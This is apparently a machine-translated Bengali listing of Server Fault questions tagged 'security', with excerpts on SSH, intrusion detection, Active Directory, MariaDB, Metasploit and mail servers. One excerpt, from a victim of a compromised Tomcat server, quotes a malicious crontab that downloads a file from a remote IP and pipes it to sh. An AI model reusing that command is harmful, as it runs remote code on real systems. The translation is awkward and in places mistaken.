প্রশ্ন ট্যাগ «security»

আমি পাবলিক কী প্রমাণীকরণ এবং অন্যান্য ব্যবহারকারীদের পাসওয়ার্ড প্রমাণীকরণ ব্যবহার করে প্রমাণীকরণকারী ব্যবহারকারীদের একটি সেট রাখতে সক্ষম হতে চাই। লিনাক্সে ওপেনএসএসএইচে এটি কি সম্ভব? যদি তাই হয় কিভাবে আমি এটি সম্পর্কে যেতে হবে? দেখার পরে /etc/ssh/sshd_config, মনে হচ্ছে আমি কী প্রমাণীকরণ সক্রিয় করতে বা PAM ব্যবহারের মধ্যে সীমাবদ্ধ।

9 linux  security  ssh 

আমি চাই যে সামহেইন কোনও ফাইল নিরীক্ষণ করুক, উদাহরণস্বরূপ বলুন /root/somefile,। এই ফাইলটি বর্তমানে বিদ্যমান নেই, তবে এটি কোনও বিন্দুতে তৈরি হয়ে গেলে আমাকে বিজ্ঞপ্তি দেওয়া চাই। আমি এটিতে যুক্ত করি samhainrc: [ReadOnly] file = /root/somefile এটি সামহেইনের দ্বারা এই লগ এন্ট্রি নিঃসরণ করতে পারে: Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: …

8 linux  security  intrusion-detection 

আমার প্রায় 200 জন ব্যবহারকারী রয়েছে। এশিয়াতে ৫০, দক্ষিণ ও পূর্ব ইউরোপে ৫০ এবং পশ্চিম ইউরোপে প্রায় ১০০ টি। আমি এশিয়াতে থাকা 50 জন ব্যবহারকারীকে এশিয়ার আমাদের ডিসির কাছে নির্দেশ করতে চাই এবং বর্তমানে এটি প্রদর্শিত হচ্ছে যে তারা আমাদের ইউরোপীয় সার্ভারগুলিতে প্রমাণীকরণ করছে, যার ফলে তারা একটি বিশাল বিলম্ব …

8 windows  windows-server-2008  active-directory  security 

অ্যাপাচি টমক্যাট সার্ভারে একটি প্রকল্পের যুদ্ধ চলাকালীন আমি দেখতে পেলাম যে সার্ভারটি আপোস করা হয়েছে। যুদ্ধের সময় অজানাতে চালাচ্ছিল cronএভাবে চলছে [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh ডাউনলোডের logo.jpgএকটি শেল স্ক্রিপ্ট রয়েছে যা …

8 linux  shell  security  tomcat 

বন্ধ থাকে। এই প্রশ্নটি অফ-টপিক । এটি বর্তমানে উত্তর গ্রহণ করছে না। এই প্রশ্নটি উন্নত করতে চান? প্রশ্নটি আপডেট করুন যাতে এটি সার্ভার ফল্টের বিষয়বস্তু । 3 বছর আগে বন্ধ । উইন্ডোজ লগগুলিতে - উইন্ডোজ নেটওয়ার্কের যে কোনও জায়গায় নির্দিষ্ট ইভেন্টগুলি উপস্থিত হলে কোনও বিজ্ঞপ্তি পাওয়ার সর্বাধিক সহজ উপায়।

8 security  windows-event-log 

আমি সবেমাত্র MariaDbএকটি তাজা উবুন্টু জিনোমে ইনস্টল করেছি এবং এর পরে mysql_secure_installation চালিয়েছি যেখানে আমি একটি শালীন প্রশাসকের পাসওয়ার্ড সেট করেছি, বেনামে ব্যবহারকারীর নাম অপসারণ করেছি ইত্যাদি। এর পরে আমি অ্যাডমিনের পাসওয়ার্ড সম্পর্কিত কিছু অদ্ভুত আচরণ বুঝতে পেরেছিলাম: যদি আমি আমার সাধারণ ব্যবহারকারীর অ্যাকাউন্ট থেকে কমান্ডটি ব্যবহার করে লগইন করার …

8 security  mariadb  authorization 

ক্যালিলিনক্স 2016 এ একটি নতুন মেটাসপ্লট (সর্বশেষ স্থিতিশীল) systemctl start postgresql OK এমএসফকনসোল-এ msf > db_status [*] postgresql connected to msf যখন আমি অনুসন্ধান চালু করি msf > search samba [!] Module database cache not built yet, using slow search সুতরাং আমি ক্যাশে পুনর্নির্মাণ ... msf > db_rebuild_cache এবং যখন …

8 linux  security 

এই প্রশ্নটি @ সুইফটঅনসিকিউরিটির টুইটার থ্রেডের সাথে সম্পর্কিত: https://twitter.com/SwiftOnSecurity/status/655208224572882944 থ্রেডটি পড়ার পরেও, কেন আপনি স্থানীয় অ্যাকাউন্টগুলির জন্য নেটওয়ার্ক লগইন অক্ষম করতে চান তা এখনও আমি পুরোপুরি পাই না। সুতরাং আমি যা ভাবছি তা এখানে, দয়া করে যেখানে আমি ভুল তা সংশোধন করুন: বলুন আমার একটি ডিসি এবং একাধিক ক্লায়েন্ট রয়েছে …

8 windows  active-directory  security  group-policy  windows-server-2012-r2 

পটভূমি : সুরক্ষা উন্নয়নের এক উপায় হিসাবে দূরবর্তী লগের সমষ্টিকে বিবেচনা করা হয়। সাধারণত, এটি কোনও ঝুঁকি মোকাবেলা করে যে কোনও আক্রমণকারী যিনি একটি সিস্টেমের সাথে আপস করেন তা ফরেন্সিক বিশ্লেষণ হতাশ করতে লগগুলি সম্পাদনা করতে বা মুছতে পারে। আমি সাধারণ লগ সরঞ্জামগুলিতে সুরক্ষা বিকল্পগুলি নিয়ে গবেষণা করছি। তবে কিছু …

8 security  logging  rsyslog  logstash  syslog-ng 

আমার একটি ডেবিয়ান ডেডিকেটেড সার্ভার রয়েছে। আমি এটি সুরক্ষিত করার চেষ্টা করছি এবং আমার মনে হয় যে এক উপায় ভাল হবে তা উদাহরণস্বরূপ এফটিপির মতো আমার প্রয়োজন পরিষেবাগুলি বন্ধ করে দেওয়া। আমি মোতায়েনের সময় এ জাতীয় কিছু চালানোর পরামর্শ দিচ্ছি: service ntp stop update-rc.d -f ntp remove service vsftpd stop …

8 linux  security  debian 

আমার ফ্রি এডাব্লুএস অ্যাকাউন্টের মেয়াদ শেষ হয়ে গেছে। আমি সব এস 3 এবং EC2 সম্পদ মোছা, কিন্তু যদি আমি চলে যাবে বিচরণ করছি Key Pairsএবং Security Groupsতাদের জন্য বেতন না করেও। (আমার অ্যাকাউন্টের সংস্থানগুলি এখন এ জাতীয় দেখাচ্ছে: সংস্থানসমূহ ) অ্যামাজনের ডকুমেন্টেশনগুলিতে এই সমস্যাটির উল্লেখ নেই বলে মনে হচ্ছে। এই …

8 security  amazon-ec2  amazon-web-services  amazon-s3  resources 

আমাদের ইতিমধ্যে এর জন্য একটি ওয়াইল্ডকার্ড শংসাপত্র রয়েছে *.mycompany.com। আমাদের নেটওয়ার্কটিতে এমন অভ্যন্তরীণ হোস্ট রয়েছে যা কেবল অভ্যন্তরীণভাবেই পৌঁছনীয়। তাদের সমস্ত internal.mycompany.comসাবডোমেনের অন্তর্গত । হোস্টের নাম সহ একটি বেসরকারী সার্ভার রয়েছে server.internal.mycompany.comযার উপরে আমি আমাদের ওয়াইল্ডকার্ড শংসাপত্র স্থাপন করেছি। আমি যখন ওয়েব সার্ভারটি দেখি তখন আমি একটি হোস্টের নামের সাথে …

8 security  ssl-certificate  subdomain  domain 

এমন একটি ওয়েব হোস্টিং সংস্থা সম্পর্কে চিন্তা করুন যা ব্যবহারকারীদের এসএসএসের মাধ্যমে ফাইল এবং গিট সংগ্রহস্থল পরিচালনা করতে দিতে চায়। এটা অন্তর্ভুক্ত: সুরক্ষিত অনুলিপি (scp) ফাইল তৈরি করা, অনুলিপি করা, মুভিং / নতুন নামকরণ এবং মুছুন উত্স নিয়ন্ত্রণ এবং পাঠ্য সম্পাদনার জন্য কমান্ডের একটি সংকীর্ণ সাবসেট কার্যকর করছে (গিট, ভিম, …

8 linux  security 

আমি / dev / shm এবং / proc সুরক্ষার উল্লেখ দেখেছি এবং আমি ভাবছিলাম যে আপনি এটি কীভাবে করেন এবং এটি কী করে করে? আমি ধরে নিচ্ছি এর মধ্যে /etc/sysctl.conf কিছুটা সঠিক সম্পাদনা জড়িত। এগুলার মত? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux  security  kernel 

আমাদের আধা-ব্যস্ত মেল সার্ভারগুলির মধ্যে একটি (সেন্ডমেল) গত কয়েকদিন ধরে আবর্জনা আদেশ জারি করে এমন হোস্টের কাছ থেকে প্রচুর অভ্যন্তরীণ সংযোগ স্থাপন করেছে। গত দু'দিনে: 39,000 টি ইউনিক আইপি থেকে অবৈধ আদেশের সাথে আগত এসএমটিপি সংযোগগুলি আইপিগুলি সারা বিশ্ব জুড়ে বিভিন্ন অঞ্চল থেকে আসে, কেবলমাত্র কয়েকটি নেটওয়ার্ক যা আমি ব্লক …

8 linux  security  smtp  sendmail